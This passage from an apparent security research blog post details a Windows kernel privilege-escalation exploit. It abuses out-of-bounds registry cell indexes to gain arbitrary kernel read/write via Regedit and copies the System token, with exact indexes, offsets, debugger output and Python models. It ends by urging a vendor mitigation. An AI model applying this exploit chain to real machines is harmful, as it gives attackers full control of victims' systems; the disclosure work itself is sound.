(&((nt!_CMHIVE*)0xffff810713f82000)->Hive.Storage[1].Length) : 0xffff810713f82390
0: kd> !reg cellindex 0xffff810713f82000 0xB2603390-4

Map = ffff810713f823a0 Type = 1 Table = 193 Block = 3 Offset = 38c
MapTable     = ffff810713debe90
MapEntry     = ffff810713debed8
BinAddress = ffff810713f82000, BlockOffset = 0000000000000000
BlockAddress = ffff810713f82000

pcell:  ffff810713f82390
```

So, indeed, index 0xB260338C points to the field representing the length of the volatile space in the HKCU hive. This is very good news for an attacker, because it means that they are able to neutralize the bounds check in HvpReleaseCellPaged by performing the following steps:

1. Crafting a controlled registry value with a data index of 0xB260338C.

2. Setting this value programmatically to a very large number, such as 0xFFFFFFFF, and thus overwriting the _HHIVE.Storage[1].Length field with it.

3. During the NtSetValueKey syscall in step 2, when HvpReleaseCellPaged is called on index 0xB260338C, the Length member has already been corrupted. As a result, the condition checked by the function is not satisfied, and the KeBugCheckEx call never occurs.

4. Since the _HHIVE.Storage[1].Length field is located in a global hive object and does not change very often (unless the storage space is expanded or shrunk), all future checks performed in HvpReleaseCellPaged against this hive will no longer pose any risk to the exploit stability.
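The steps above can be modelled with a short Python simulation. It only reproduces the length comparison from the HvpReleaseCellPaged pseudocode (the map entry NULL check is left out), and the names `release_cell`, `length_field_index` and `BugCheck` are hypothetical. The initial storage lengths are the sample values of the HKCU hive discussed earlier.

```python
class BugCheck(Exception):
    """Stands in for KeBugCheckEx(REGISTRY_ERROR, ...)."""


CMHIVE_INDEX = 0xB2603000       # OOB index resolving to the _CMHIVE base
VOLATILE_LENGTH_OFFSET = 0x390  # offset of Storage[1].Length in _HHIVE
CELL_HEADER = 4                 # added by the cell map walk


def length_field_index(base_index, field_offset):
    """Index whose translated address lands exactly on the given field."""
    return base_index + field_offset - CELL_HEADER


def release_cell(storage_lengths, cell):
    """Model of the bounds check performed when a cell is released."""
    storage_type = cell >> 31
    storage_index = cell & 0x7FFFFFFF
    if storage_index >= storage_lengths[storage_type]:
        raise BugCheck("REGISTRY_ERROR (0x51)")


lengths = [0xEE000, 0x5000]  # stable and volatile lengths before the attack
index = length_field_index(CMHIVE_INDEX, VOLATILE_LENGTH_OFFSET)
print(hex(index))  # 0xb260338c

try:
    release_cell(lengths, CMHIVE_INDEX)
except BugCheck as error:
    print("before overwrite:", error)

# The write through the crafted value happens before the release call.
lengths[1] = 0xFFFFFFFF
release_cell(lengths, index)         # no bugcheck
release_cell(lengths, CMHIVE_INDEX)  # later OOB accesses pass as well
print("after overwrite: check passes")
```

The ordering is the essential point: the corrupted length is already in place by the time the release routine compares the index against it.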

To better realize just how close the overwriting of the Length field is to its use in the bounds check, we can have a look at the disassembly of the CmpSetValueKeyExisting function, where this whole logic takes place.

The technique works by a hair’s breadth – the memmove and HvpReleaseCellPaged calls are separated by only a few instructions. Nevertheless, it works, and if we first perform a write to the 0xB260338C index (or equivalent) after gaining binary control over the hive, then we will be subsequently able to read from/write to any OOB indexes without any restrictions in the future.

For completeness, I should mention that after corrupting the Length field, it is worthwhile to set a few additional flags in the _HHIVE.HiveFlags field using the same trick as before. This prevents the kernel from crashing due to the unexpectedly large hive length. Specifically, the flags are (as named in blog post #6):

- HIVE_COMPLETE_UNLOAD_STARTED (0x40): This prevents a crash during potential hive unloading in the CmpLateUnloadHiveWorker → CmpCompleteUnloadKey → HvHiveCleanup → HvpFreeMap → CmpFree call chain.

- HIVE_FILE_READ_ONLY (0x8000): This prevents a crash that could occur in the CmpFlushHive → HvStoreModifiedData → HvpTruncateBins path.
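As a small illustration, the new flag value can be computed as a read-modify-write of the current HiveFlags contents. This is only a sketch: the helper name is hypothetical, the flag names and values are the ones listed above, and the starting value in the example is made up.

```python
HIVE_COMPLETE_UNLOAD_STARTED = 0x40
HIVE_FILE_READ_ONLY = 0x8000


def patched_hive_flags(current_flags):
    """Return the flags with both stabilizing bits set, preserving the rest."""
    return current_flags | HIVE_COMPLETE_UNLOAD_STARTED | HIVE_FILE_READ_ONLY


print(hex(patched_hive_flags(0x0)))   # 0x8040
print(hex(patched_hive_flags(0x12)))  # 0x8052 (hypothetical pre-existing flags kept)
```

Preserving the existing bits matters because the field is read first through the controlled value and then written back with the two extra flags added.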

Of course, these are just conclusions drawn from writing a demonstration exploit, so I don’t guarantee that the above flags are sufficient to maintain system stability in every configuration. Nevertheless, repeated tests have shown that it works in my environment, and if we subsequently set the data cell index of the controlled value back to 0xB2603000, and the Type/DataLength fields to something like REG_BINARY and 0x100, we should be finally able to see the following result in the Registry Editor:

It is easy to verify that this is indeed a “live view” into the _CMHIVE structure in kernel memory:

```
0: kd> dt _HHIVE ffff810713f82000
nt!_HHIVE
   +0x000 Signature          : 0xbee0bee0
   +0x008 GetCellRoutine     : 0xfffff801`8049b370     _CELL_DATA*  nt!HvpGetCellPaged+0
   +0x010 ReleaseCellRoutine : 0xfffff801`8049b330     void  nt!HvpReleaseCellPaged+0
   +0x018 Allocate           : 0xfffff801`804cae30     void*  nt!CmpAllocate+0
   +0x020 Free               : 0xfffff801`804c9100     void  nt!CmpFree+0
   +0x028 FileWrite          : 0xfffff801`80595e00     long  nt!CmpFileWrite+0
   +0x030 FileRead           : 0xfffff801`805336a0     long  nt!CmpFileRead+0
   +0x038 HiveLoadFailure    : (null)
   +0x040 BaseBlock          : 0xffff8107`13f9a000 _HBASE_BLOCK
[…]
```

Unfortunately, the hive signature 0xBEE0BEE0 is not visible in the screenshot, because the first four bytes of the cell are treated as its size, and only the subsequent bytes as actual data. For this reason, the entire view of the structure is shifted by 4 bytes. Nevertheless, it is immediately apparent that we have gained direct access to function addresses within the kernel image, as well as many other interesting pointers and data. We are getting very close to our goal!
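The 4-byte shift is easy to account for when parsing the value data programmatically. The following Python sketch uses a synthetic buffer filled with the pointers from the structure dump above; the helper `read_hhive_pointers` is hypothetical, and in a real scenario the bytes would come from querying the controlled registry value.

```python
import struct

CELL_HEADER = 4  # the first four bytes of the structure are consumed as the cell size

# Offsets within _HHIVE, as shown in the structure dump.
HHIVE_POINTER_OFFSETS = {
    "GetCellRoutine": 0x08,
    "ReleaseCellRoutine": 0x10,
    "BaseBlock": 0x40,
}


def read_hhive_pointers(value_data):
    """Extract selected 64-bit pointers from the shifted view of _HHIVE."""
    return {
        name: struct.unpack_from("<Q", value_data, offset - CELL_HEADER)[0]
        for name, offset in HHIVE_POINTER_OFFSETS.items()
    }


# Synthetic copy of the start of the structure, for demonstration only.
structure = bytearray(0x104)
struct.pack_into("<I", structure, 0x00, 0xBEE0BEE0)
struct.pack_into("<Q", structure, 0x08, 0xFFFFF8018049B370)
struct.pack_into("<Q", structure, 0x10, 0xFFFFF8018049B330)
struct.pack_into("<Q", structure, 0x40, 0xFFFF810713F9A000)

# What a 0x100-byte value backed by index 0xB2603000 would expose.
value_data = bytes(structure[CELL_HEADER:CELL_HEADER + 0x100])

for name, pointer in read_hhive_pointers(value_data).items():
    print(f"{name:20s} 0x{pointer:016x}")
```

Every structure offset is simply reduced by 4 to obtain the position within the value data, which also explains why the signature itself never appears in the view.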

Step 3: Getting arbitrary read/write access to the entire kernel address space

At this point, we can both read from and write to the _CMHIVE structure through our magic value, and also operate on any other out-of-bounds cell index that resolves to a valid address. This means that we no longer need to worry about kernel ASLR, as _CMHIVE readily leaks the base address of ntoskrnl.exe, as well as many other addresses from kernel pools. The question now is how to use these capabilities to execute our own payload in kernel mode or otherwise elevate our process’s privileges in the system.

What may immediately come to mind, given the layout of the _CMHIVE / _HHIVE structure, is overwriting one of the function pointers located at its beginning. In practice, this is less useful than it seems. As I wrote in blog post #6, the vast majority of operations on these pointers have been devirtualized, and the few remaining indirect calls are protected by the Control Flow Guard mitigation. Perhaps a CFG bypass could ultimately be worked out, but with the primitives currently available to us, I decided that this route was more difficult than necessary.

If not that, then what else? Experienced exploit developers would surely find dozens of different ways to complete the privilege escalation process. However, I had a specific goal in mind that I wanted to achieve from the start. I thought it would be elegant to create an arrangement of objects where the final stage of exploitation could be performed interactively from within Regedit. This brings us back to the selection of our two fake values, “KernelAddr” and “KernelData”. My goal with these values was to be able to enter any kernel address into KernelAddr, and have KernelData automatically (based solely on how the registry works) contain the data from that address, available for both reading and writing. This would enable a unique situation where the user could view and modify kernel memory within the graphical interface of a tool available in a default Windows installation, something that doesn’t happen very often. 🙂

The crucial observation that allows us to even consider such a setup is the versatility of the cell maps mechanism. In order for such an obscure arrangement to work, KernelData must utilize a _HMAP_ENTRY structure controlled by KernelAddr at the final stage of the cell walk. Referring back to the previous diagram illustrating the relationships between the _CMHIVE structure and other objects, this implies that if KernelAddr reaches an object through two pointer dereferences, KernelData must be configured to reach it with a single dereference, so that the second dereference then occurs through the data stored in KernelAddr.

In practice, this can be achieved as follows: KernelAddr will function much as before, pointing to an offset within _CMHIVE through one of the following chains of pointer dereferences:

- _CMHIVE.CmRm → _CM_RM.Hive → _CMHIVE: for normal hives (e.g., HKCU).

- _CMHIVE.RootKcb → _CM_KEY_CONTROL_BLOCK.KeyHive → _CMHIVE: for app hives.

For KernelData, we can use any self-referencing pointer in the first step of the cell walk. These are plentiful in _CMHIVE, due to the fact that there are many LIST_ENTRY objects initialized as an empty list.

The next step is to select the appropriate offsets and indexes based on the layout of the _CMHIVE structure, so that everything aligns with our plan. Starting with KernelAddr, the highest 20 bits of the cell index remain the same as before, which is 0xB2603???. The lower 12 bits will correspond to an offset within _CMHIVE where we will place our fake _HMAP_ENTRY object. This should be a 0x18-byte region that is generally unused and located after a self-referencing pointer. For demonstration purposes, I used offset 0xB70, which corresponds to the following fields:

| _CMHIVE layout | _HMAP_ENTRY layout |
| --- | --- |
| +0xb70 UnloadEventArray : Ptr64 Ptr64 _KEVENT | +0x000 BlockOffset : Uint8B |
| +0xb78 RootKcb : Ptr64 _CM_KEY_CONTROL_BLOCK | +0x008 PermanentBinAddress : Uint8B |
| +0xb80 Frozen : UChar | +0x010 MemAlloc : Uint4B |

On my test Windows 11 system, all these fields are zeroed out and unused for the HKCU hive, which makes them well-suited for acting as the _HMAP_ENTRY structure. The final cell index for the KernelAddr value will, therefore, be 0xB2603000 + 0xB70 – 0x4 = 0xB2603B6C. If we set its type to REG_QWORD and its length to 8 bytes, then each write to it will result in setting the _CMHIVE.UnloadEventArray field (or _HMAP_ENTRY.BlockOffset in the context of the cell walk) to the specified 64-bit number.
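The arithmetic behind the KernelAddr cell index, and the bytes that a REG_QWORD write delivers to the fake BlockOffset field, can be sketched as follows. The constants come from the text above; the helper name `qword_payload` and the example address are illustrative only.

```python
import struct

CELL_INDEX_BASE = 0xB2603000  # cell index resolving to the start of _CMHIVE
FAKE_ENTRY_OFFSET = 0xB70     # _CMHIVE.UnloadEventArray, reused as BlockOffset
CELL_HEADER_SIZE = 4          # the cell walk skips a 4-byte cell size field

# Subtracting 4 makes the value's data start exactly at offset 0xB70.
kernel_addr_index = CELL_INDEX_BASE + FAKE_ENTRY_OFFSET - CELL_HEADER_SIZE


def qword_payload(address: int) -> bytes:
    """Encode a 64-bit address as the 8 little-endian bytes of a REG_QWORD."""
    return struct.pack("<Q", address)


print(hex(kernel_addr_index))
print(qword_payload(0xFFFFF80350800004).hex(" "))
```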

As for KernelData, we will use _CMHIVE.SecurityHash[3].Flink, located at offset 0x798, as the aforementioned self-referencing pointer. To calculate the directory index, we subtract the offset of _CMHIVE.Hive.Storage[1].SmallDir from the offset of this pointer and then divide by 8 (the size of a pointer), which gives us: (0x798 – 0x3A0) ÷ 8 = 0x7F. Next, we calculate the table index by subtracting the offset of the self-referencing pointer from the offset of the fake _HMAP_ENTRY structure and then dividing the result by the size of _HMAP_ENTRY: (0xB70 – 0x798) ÷ 0x18 = 0x29. If we assume that the 12-bit offset part is zero (we don’t want to add any offsets at this point), then we have all the elements needed to compose the full cell index. We will use the MakeCellIndex helper function defined earlier for this purpose:

    >>> MakeCellIndex(1, 0x7F, 0x29, 0)
    0x8fe29000
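For readers who want to reproduce the numbers, here is a minimal sketch that derives both indexes from the structure offsets and packs them into a cell index. It assumes the usual cell index bit layout (1 bit of storage type, 10 bits of directory index, 9 bits of table index, 12 bits of offset); `make_cell_index` and `split_cell_index` are my own illustrative stand-ins and not necessarily identical to the MakeCellIndex helper used above.

```python
SMALLDIR_OFFSET = 0x3A0    # _CMHIVE.Hive.Storage[1].SmallDir
SELF_REF_OFFSET = 0x798    # _CMHIVE.SecurityHash[3].Flink
FAKE_ENTRY_OFFSET = 0xB70  # fake _HMAP_ENTRY inside _CMHIVE
POINTER_SIZE = 8
HMAP_ENTRY_SIZE = 0x18


def make_cell_index(storage: int, directory: int, table: int, offset: int) -> int:
    """Pack the four components into a 32-bit cell index (assumed 1/10/9/12 layout)."""
    if not (storage in (0, 1) and 0 <= directory < 0x400
            and 0 <= table < 0x200 and 0 <= offset < 0x1000):
        raise ValueError("component out of range")
    return (storage << 31) | (directory << 21) | (table << 12) | offset


def split_cell_index(index: int):
    """Inverse of make_cell_index: return (storage, directory, table, offset)."""
    return index >> 31, (index >> 21) & 0x3FF, (index >> 12) & 0x1FF, index & 0xFFF


directory_index = (SELF_REF_OFFSET - SMALLDIR_OFFSET) // POINTER_SIZE
table_index = (FAKE_ENTRY_OFFSET - SELF_REF_OFFSET) // HMAP_ENTRY_SIZE
kernel_data_index = make_cell_index(1, directory_index, table_index, 0)

print(hex(directory_index), hex(table_index), hex(kernel_data_index))
```

Running `split_cell_index(0xB2603B6C)` on the KernelAddr index yields directory index 0x193, table index 3 and offset 0xB6C under the same assumed layout.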

So, the cell index for the KernelData value will be 0x8FE29000, and with that, we have all the puzzle pieces needed to assemble our intricate construction. This is illustrated in the diagram below:

The cell map walk for the KernelAddr value is shown on the right side of the _CMHIVE structure, and the cell map walk for KernelData is on the left. The dashed arrows marked with numbers ①, ②, and ③ correspond to the consecutive elements of the cell index (i.e., directory index, table index, and offset), while the solid arrows represent dereferences of individual pointers. As you can see, we successfully managed to select indexes where the data of one value directly influences the target virtual address to which the other one is resolved.
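The KernelData side of this construction can also be checked with a small simulation. The sketch below models _CMHIVE as a zero-filled buffer at the example address from the earlier WinDbg dump, assumes that the cell map directory for Storage[1] is the in-structure SmallDir field, and only emulates the effect of a KernelAddr write (storing a 64-bit value at offset 0xB70). The function and variable names are hypothetical.

```python
import struct

HIVE_BASE = 0xFFFF810713F82000  # example _CMHIVE address from the dump above
SMALLDIR_OFFSET = 0x3A0         # _CMHIVE.Hive.Storage[1].SmallDir
SELF_REF_OFFSET = 0x798         # _CMHIVE.SecurityHash[3].Flink
FAKE_ENTRY_OFFSET = 0xB70       # fake _HMAP_ENTRY (BlockOffset at +0)
HMAP_ENTRY_SIZE = 0x18
MASK64 = (1 << 64) - 1

hive = bytearray(0x1000)  # zero-filled stand-in for the _CMHIVE structure


def write_qword(offset: int, value: int) -> None:
    struct.pack_into("<Q", hive, offset, value)


def read_qword(address: int) -> int:
    """Read 8 bytes at a virtual address inside the simulated structure."""
    return struct.unpack_from("<Q", hive, address - HIVE_BASE)[0]


def resolve(index: int) -> int:
    """Model of the cell walk for a volatile (storage type 1) cell index."""
    directory = HIVE_BASE + SMALLDIR_OFFSET
    table = read_qword(directory + ((index >> 21) & 0x3FF) * 8)
    entry = table + ((index >> 12) & 0x1FF) * HMAP_ENTRY_SIZE
    block_offset = read_qword(entry)
    permanent_bin_address = read_qword(entry + 8)
    return ((permanent_bin_address & ~0xF) + block_offset
            + (index & 0xFFF) + 4) & MASK64


# An empty LIST_ENTRY points back at itself.
write_qword(SELF_REF_OFFSET, HIVE_BASE + SELF_REF_OFFSET)
# Effect of writing a target address to the KernelAddr value.
write_qword(FAKE_ENTRY_OFFSET, 0xFFFFF80350800000)

print(hex(resolve(0x8FE29000)))
```

With these inputs, the resolved address is the value stored through KernelAddr plus 4, which is the behavior of the unmodified cell walk.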

We could end this section right here, but there is one more minor issue I’d like to mention. As you may recall, the HvpGetCellPaged function ends with the following statement:

    return (Entry->PermanentBinAddress & (~0xF)) + Entry->BlockOffset + (Index & 0xFFF) + 4;

Our current assumption is that the PermanentBinAddress and the lower 12 bits of the index are both zero, and BlockOffset contains the exact value of the address we want to access. Unfortunately, the expression ends with the extra “+4”. Normally, this skips the cell size and directly returns a pointer to the cell’s data, but in our exploit, it means we would see a view of the kernel memory shifted by four bytes. This isn’t a huge issue in practical terms, but it doesn’t look perfect in a demonstration.

So, can we do anything about this? It turns out, we can. What we want to achieve is to subtract 4 from the final result using the other controlled addends in the expression (PermanentBinAddress and BlockOffset). Individually, each of them has some limitations:

- The PermanentBinAddress is a fully controlled 64-bit field, but only its upper 60 bits are used when constructing the cell address. This means we can only use it to subtract multiples of 0x10, but not exactly 4.

- The cell offset is a 12-bit unsigned number, so we can use it to add any number in the 1–4095 range, but we can’t subtract anything.

However, we can combine the two to achieve the desired goal. If we set PermanentBinAddress to 0xFFFFFFFFFFFFFFF0 (-0x10 in 64-bit two’s complement representation) and the cell offset to 0xC, their sum will be -4, which cancels out the unconditionally added +4 and causes the HvpGetCellPaged function to return exactly Entry->BlockOffset. For our exploit, this means one additional write to the _CMHIVE structure to properly initialize the fake PermanentBinAddress field, and a slight change in the cell index of the KernelData value from the previous 0x8FE29000 to 0x8FE2900C. If we perform all these steps correctly, we should be able to read and write arbitrary kernel memory via Regedit. For example, let’s dump the data at the beginning of the ntoskrnl.exe kernel image using WinDbg:
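The cancellation is easy to verify with 64-bit wraparound arithmetic. The following sketch evaluates the return expression quoted above for both cell indexes; `resolved_address` is an illustrative name, and masking with 2^64 - 1 stands in for the natural overflow of 64-bit registers.

```python
MASK64 = (1 << 64) - 1


def resolved_address(permanent_bin_address: int, block_offset: int,
                     cell_index: int) -> int:
    """Evaluate the final expression of the cell walk modulo 2**64."""
    total = ((permanent_bin_address & ~0xF) + block_offset
             + (cell_index & 0xFFF) + 4)
    return total & MASK64


target = 0xFFFFF80350800004  # address we want KernelData to expose

# Original setup: zero PermanentBinAddress, zero offset -> view shifted by 4.
shifted = resolved_address(0, target, 0x8FE29000)
# Adjusted setup: -0x10 from PermanentBinAddress plus 0xC from the offset.
exact = resolved_address(0xFFFFFFFFFFFFFFF0, target, 0x8FE2900C)

print(hex(shifted), hex(exact))
```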

    0: kd> ? nt
    Evaluate expression: -8781857554432 = fffff803`50800000
    0: kd> db /c8 fffff803`50800004
    fffff803`50800004  03 00 00 00 04 00 00 00  ........
    fffff803`5080000c  ff ff 00 00 b8 00 00 00  ........
    fffff803`50800014  00 00 00 00 40 00 00 00  ....@...
    fffff803`5080001c  00 00 00 00 00 00 00 00  ........
    fffff803`50800024  00 00 00 00 00 00 00 00  ........
    fffff803`5080002c  00 00 00 00 00 00 00 00  ........
    fffff803`50800034  00 00 00 00 00 00 00 00  ........
    fffff803`5080003c  10 01 00 00 0e 1f ba 0e  ........
    fffff803`50800044  00 b4 09 cd 21 b8 01 4c  ....!..L
    fffff803`5080004c  cd 21 54 68 69 73 20 70  .!This p
    fffff803`50800054  72 6f 67 72 61 6d 20 63  rogram c
    fffff803`5080005c  61 6e 6e 6f 74 20 62 65  annot be

And then let’s browse to the same address using our FakeKey in Regedit:

The data from both sources match, and the KernelData value displays them correctly without any additional offset. A keen observer will note that the expected “MZ” signature is not there, because I entered an address 4 bytes greater than the kernel image base. I did this because, even though we can “peek” at any virtual address X through the special registry value, the kernel still internally accesses address X-4 for certain implementation reasons. Since there isn’t any data mapped directly before the ntoskrnl.exe image in memory, using the exact image base would result in a system crash while trying to read from the invalid address 0xFFFFF803507FFFFC.

An even more attentive reader will also notice that the exploit has jokingly changed the window title from “Registry Editor” to “Kernel Memory Editor”, as that’s what the program has effectively become at this point. 🙂

Step 4: Elevating process security token

With an arbitrary kernel read/write primitive and the address of ntoskrnl.exe at our disposal, escalating privileges is a formality. The simplest approach is perhaps to iterate through the linked list of all processes (made of _EPROCESS structures) starting from nt!KiProcessListHead, find both the “System” process and our own process on the list, and then copy the security token from the former to the latter. This method is illustrated in the diagram below.
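The list walk and token copy can be sketched against a mock memory model. Everything structural here is an assumption made for illustration: the three field offsets are placeholders (the real ones depend on the Windows build), `FakeKernel` merely stands in for the read/write primitive, the list head address is made up, and only forward (Flink) pointers are modelled. The process addresses, PID and token value are taken from the exploit output shown later in this post.

```python
# Placeholder offsets; real values differ between Windows builds.
LINKS_OFFSET = 0x100   # hypothetical offset of the LIST_ENTRY linking processes
PID_OFFSET = 0x080     # hypothetical offset of the process ID field
TOKEN_OFFSET = 0x0C0   # hypothetical offset of the security token field
SYSTEM_PID = 4         # the "System" process always has PID 4


class FakeKernel:
    """Dictionary-backed stand-in for the arbitrary read/write primitive."""

    def __init__(self):
        self.mem = {}

    def read_qword(self, address):
        return self.mem.get(address, 0)

    def write_qword(self, address, value):
        self.mem[address] = value


def find_process(kernel, list_head, pid):
    """Follow Flink pointers from list_head until a process with pid is found."""
    entry = kernel.read_qword(list_head)
    while entry != list_head:
        process = entry - LINKS_OFFSET
        if kernel.read_qword(process + PID_OFFSET) == pid:
            return process
        entry = kernel.read_qword(entry)
    return None


def steal_token(kernel, list_head, our_pid):
    """Copy the System process token into the process identified by our_pid."""
    system = find_process(kernel, list_head, SYSTEM_PID)
    ours = find_process(kernel, list_head, our_pid)
    if system is None or ours is None:
        raise LookupError("process not found on the list")
    token = kernel.read_qword(system + TOKEN_OFFSET)
    kernel.write_qword(ours + TOKEN_OFFSET, token)
    return token


# Build a tiny circular list: head -> System -> cmd.exe -> head.
kernel = FakeKernel()
HEAD = 0xFFFFF80351000000  # made-up list head address
SYSTEM, CMD = 0xFFFF8107AD0ED040, 0xFFFF8107B3864080
kernel.write_qword(SYSTEM + PID_OFFSET, SYSTEM_PID)
kernel.write_qword(CMD + PID_OFFSET, 6892)
kernel.write_qword(SYSTEM + TOKEN_OFFSET, 0xFFFFC608B4C8A943)
kernel.write_qword(HEAD, SYSTEM + LINKS_OFFSET)
kernel.write_qword(SYSTEM + LINKS_OFFSET, CMD + LINKS_OFFSET)
kernel.write_qword(CMD + LINKS_OFFSET, HEAD)

steal_token(kernel, HEAD, 6892)
print(hex(kernel.read_qword(CMD + TOKEN_OFFSET)))
```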

This entire procedure could easily be performed programmatically, using only RegQueryValueEx and RegSetValueEx calls. However, it would be a shame not to take advantage of the fact that we can modify kernel memory through built-in Windows tools. Therefore, my exploit performs most of the necessary steps automatically, except for the final stage – overwriting the process security token. For that part, it creates a .reg file on disk that refers to our fake key and its two registry values. The first is KernelAddr, which points to the address of the security token within the _EPROCESS structure of a newly created command prompt, followed by KernelData, which contains the actual value of the System token. The invocation and output of the exploit look as follows:

    C:\Users\user\Desktop\exploits>Exploit.exe C:\users\user\Desktop\become_admin.reg
    [+] Found kernel base address: fffff80350800000
    [+] Spawning a command prompt...
    [+] Found PID 6892 at address ffff8107b3864080
    [+] System process: ffff8107ad0ed040, security token: ffffc608b4c8a943
    [+] Exploit succeeded, enjoy!

    C:\Users\user\Desktop\exploits>
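To give an idea of what such a .reg file might contain, here is a rough sketch of a generator. It relies on the standard .reg syntax in which a REG_QWORD is written as `hex(b):` followed by eight little-endian bytes. The key path, the token field offset and the choice to express KernelData as a REG_QWORD are assumptions made for this example, not details taken from the actual exploit; file encoding and writing the file to disk are left out.

```python
FAKE_KEY_PATH = r"HKEY_CURRENT_USER\FakeKey"  # hypothetical location of the fake key
TOKEN_OFFSET = 0x4B8                          # assumed token offset; varies by build


def reg_qword(value: int) -> str:
    """Format a 64-bit integer as a .reg REG_QWORD body (hex(b) + LE bytes)."""
    return "hex(b):" + ",".join(f"{b:02x}" for b in value.to_bytes(8, "little"))


def build_reg_file(key_path: str, token_field_address: int, system_token: int) -> str:
    """Return .reg text that sets KernelAddr first and KernelData second."""
    lines = [
        "Windows Registry Editor Version 5.00",
        "",
        f"[{key_path}]",
        f'"KernelAddr"={reg_qword(token_field_address)}',
        f'"KernelData"={reg_qword(system_token)}',
        "",
    ]
    return "\r\n".join(lines)


# Process address and token value as printed by the exploit above.
reg_text = build_reg_file(FAKE_KEY_PATH,
                          0xFFFF8107B3864080 + TOKEN_OFFSET,
                          0xFFFFC608B4C8A943)
print(reg_text)
```

The ordering of the two values matters in this design: KernelAddr has to be applied before KernelData, so that the second write lands at the address selected by the first.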

Then, a new command prompt window appears on the screen. There, we can manually perform the final step of the attack, applying changes from the newly created become_admin.reg file using the reg.exe tool, thus overwriting the appropriate field in kernel memory and granting ourselves elevated privileges:

As we can see, the attack was indeed successful, and our cmd.exe process is now running as NT AUTHORITY\SYSTEM. A similar effect could be achieved from the graphical interface by double-clicking the .reg file and applying it using the Regedit program associated with this extension. This is exactly how I finalized my attack during the exploit demonstration at OffensiveCon 2024, which can be viewed in the recording of the presentation:

Final thoughts

Since we have now fully achieved our intended goal, we can return to our earlier, incomplete diagram, and fill it in with all the intermediate steps we have taken:

To conclude this blog post, I would like to share some final thoughts regarding hive-based memory corruption vulnerabilities.

Exploit mitigations

The above exploit shows that out-of-bounds cell indexes in the registry are a powerful exploitation technique, whose main strength lies in its determinism. Within a specific version of the operating system, a given OOB index will always result in references to the same fields of the _CMHIVE structure, which eliminates the need to use any probabilistic exploitation methods such as kernel pool spraying. Of all the available hive memory corruption exploitation methods, I consider this one to be the most stable and practical.

Therefore, it should come as no surprise that I would like Microsoft to mitigate this technique for the security of all Windows users. I already emphasized this in my previous blog post #7, but now the benefit of this mitigation is even more apparent: since the cell index bounds check is already present in HvpReleaseCellPaged, moving it to HvpGetCellPaged should be completely neutral in terms of system performance, and it would fully prevent the use of OOB indexes for any malicious purposes. I suggested this course of action in November 2023, but it hasn’t been implemented by the vendor yet, so all the techniques described here still work at the time of publication.
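To make the proposed mitigation concrete, the sketch below models a bounds check performed before a cell index is translated. It is an illustration of the idea only and not Microsoft's code: the comparison against a per-storage length, the exception type and the example lengths are all assumptions.

```python
class CellIndexOutOfBounds(Exception):
    """Raised when a cell index points past the end of its storage space."""


def check_cell_index(index: int, storage_lengths) -> int:
    """Reject indexes whose 31-bit offset exceeds the length of their storage.

    storage_lengths holds the current length of the stable (0) and
    volatile (1) storage spaces, in bytes.
    """
    storage = index >> 31
    offset_in_storage = index & 0x7FFFFFFF
    if offset_in_storage >= storage_lengths[storage]:
        raise CellIndexOutOfBounds(hex(index))
    return index


# Hypothetical lengths for a small hive: 0x5000 stable, 0x2000 volatile bytes.
lengths = (0x5000, 0x2000)

check_cell_index(0x80000020, lengths)  # in-bounds volatile cell: accepted
for oob_index in (0xB2603B6C, 0x8FE2900C):
    try:
        check_cell_index(oob_index, lengths)
    except CellIndexOutOfBounds as exc:
        print("rejected", exc)
```

Both cell indexes used by the exploit in this post fall far outside such a small storage space, so a check of this kind in the cell translation path would reject them before any pointer is dereferenced.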

False File Immutability